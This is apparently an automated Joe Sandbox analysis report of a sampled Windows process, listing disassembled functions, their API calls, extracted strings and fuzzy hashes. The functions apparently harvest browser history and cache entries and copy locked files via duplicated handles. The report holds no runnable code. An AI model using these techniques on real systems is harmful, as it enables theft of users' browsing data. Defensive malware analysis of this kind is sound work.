                                                                                                                                                                                          control_flow_graph 505 40e2ab-40e2d5 call 40695d call 406b90 510 40e4a0-40e4af call 4069a3 505->510 511 40e2db-40e300 505->511 513 40e304-40e30f call 406e8f 511->513 516 40e314-40e316 513->516 517 40e476-40e483 call 406b53 516->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 516->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->513 525->510 531 40e497-40e49f ??3@YAXPAX@Z 525->531 531->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 550 40e3b0 543->550 551 40e3b3-40e3c1 wcschr 543->551 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 552 40e3fb-40e40c memcpy 549->552 553 40e40f-40e414 549->553 550->551 551->542 556 40e3c3-40e3c6 551->556 552->553 554 40e416-40e427 memcpy 553->554 555 40e42a-40e42f 553->555 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040E407
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040E422
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040E43D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                                                                                                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                          • API String ID: 3073804840-2252543386
                                                                                                                                                                                          • Opcode ID: 35fc9b2dc3bf0c53ac8202c9ceeae987a6694a0ed3ba5102275c9a20083620c3
                                                                                                                                                                                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                          • Opcode Fuzzy Hash: 35fc9b2dc3bf0c53ac8202c9ceeae987a6694a0ed3ba5102275c9a20083620c3
                                                                                                                                                                                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-409248 call 40b273 call 438552 563->569 574 409383-4093ab call 40b273 call 438552 569->574 575 40924e-409258 call 4251c4 569->575 587 4093b1 574->587 588 4094ff-409502 call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 591 4093d3-4093dd call 4251c4 587->591 594 409507-40950b 588->594 598 4093b3-4093cc call 4253cf * 2 591->598 599 4093df 591->599 594->568 597 40950d-409511 594->597 597->568 601 409513-40951d call 408f2f 597->601 598->591 614 4093ce-4093d1 598->614 602 4094f7-4094fa call 424f26 599->602 601->568 602->588 611->580 613 40929f-4092a3 611->613 613->580 615 4092a9-4092ba 613->615 614->591 616 4093e4-4093fb call 4253af * 2 614->616 617 4092bc 615->617 618 4092be-4092e3 memcpy memcmp 615->618 616->602 628 409401-409403 616->628 617->618 619 409333-409345 memcmp 618->619 620 4092e5-4092ec 618->620 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->602 629 409409-40941b memcmp 628->629 629->602 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->602 634 4094b8-4094ed memcpy * 2 631->634 632->602 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->602
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3715365532-3916222277
                                                                                                                                                                                          • Opcode ID: 01ed04e1a7b420fb387fb27120c7235570de5edaa712acc26e4f47695a5ab2cb
                                                                                                                                                                                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 01ed04e1a7b420fb387fb27120c7235570de5edaa712acc26e4f47695a5ab2cb
                                                                                                                                                                                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                            • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                          • String ID: bhv
                                                                                                                                                                                          • API String ID: 327780389-2689659898
                                                                                                                                                                                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                          • API String ID: 2941347001-70141382
                                                                                                                                                                                          • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                          • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 712 4467ac-4467b7 __setusermatherr 703->712 713 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->713 705->701 707 44674d-44674f 705->707 706->701 709 446734-44673b 706->709 711 446755-446758 707->711 709->701 710 44673d-446745 709->710 710->711 711->703 712->713 716 446810-446819 713->716 717 44681e-446825 713->717 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 728 446853-446864 GetStartupInfoW 721->728 729 44684d-446851 721->729 722->720 723->719 723->724 724->721 726 446840-446842 724->726 726->721 730 446866-44686a 728->730 731 446879-44687b 728->731 729->726 729->728 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2827331108-0
                                                                                                                                                                                          • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                                                          • String ID: visited:
                                                                                                                                                                                          • API String ID: 1157525455-1702587658
                                                                                                                                                                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 781 40e283-40e286 775->781 776->775 787 40e21b-40e21d 776->787 784 40e291-40e294 call 40aa04 781->784 785 40e288-40e290 ??3@YAXPAX@Z 781->785 784->769 785->784 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                          • API String ID: 3883404497-2982631422
                                                                                                                                                                                          • Opcode ID: f6320f83e9b091826697580f88646c77f053f42bbd7529e7c130ef97409cf436
                                                                                                                                                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                          • Opcode Fuzzy Hash: f6320f83e9b091826697580f88646c77f053f42bbd7529e7c130ef97409cf436
                                                                                                                                                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                          • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                          • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                          • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040BD2B
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 509814883-3916222277
                                                                                                                                                                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 848 41837f-4183bf 849 4183c1-4183cc call 418197 848->849 850 4183dc-4183ec call 418160 848->850 855 4183d2-4183d8 849->855 856 418517-41851d 849->856 857 4183f6-41840b 850->857 858 4183ee-4183f1 850->858 855->850 859 418417-418423 857->859 860 41840d-418415 857->860 858->856 861 418427-418442 call 41739b 859->861 860->861 864 418444-41845d CreateFileW 861->864 865 41845f-418475 CreateFileA 861->865 866 418477-41847c 864->866 865->866 867 4184c2-4184c7 866->867 868 41847e-418495 GetLastError ??3@YAXPAX@Z 866->868 871 4184d5-418501 memset call 418758 867->871 872 4184c9-4184d3 867->872 869 4184b5-4184c0 call 444706 868->869 870 418497-4184b3 call 41837f 868->870 869->856 870->856 876 418506-418515 ??3@YAXPAX@Z 871->876 872->871 876->856
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile$??3@ErrorLast
                                                                                                                                                                                          • String ID: |A
                                                                                                                                                                                          • API String ID: 1407640353-1717621600
                                                                                                                                                                                          • Opcode ID: 5aeeff076a9cd849f72a1ec08649adad283ef9ce1d91fa95086884072959f8da
                                                                                                                                                                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aeeff076a9cd849f72a1ec08649adad283ef9ce1d91fa95086884072959f8da
                                                                                                                                                                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                                          • API String ID: 2791114272-628097481
                                                                                                                                                                                          • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                          • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
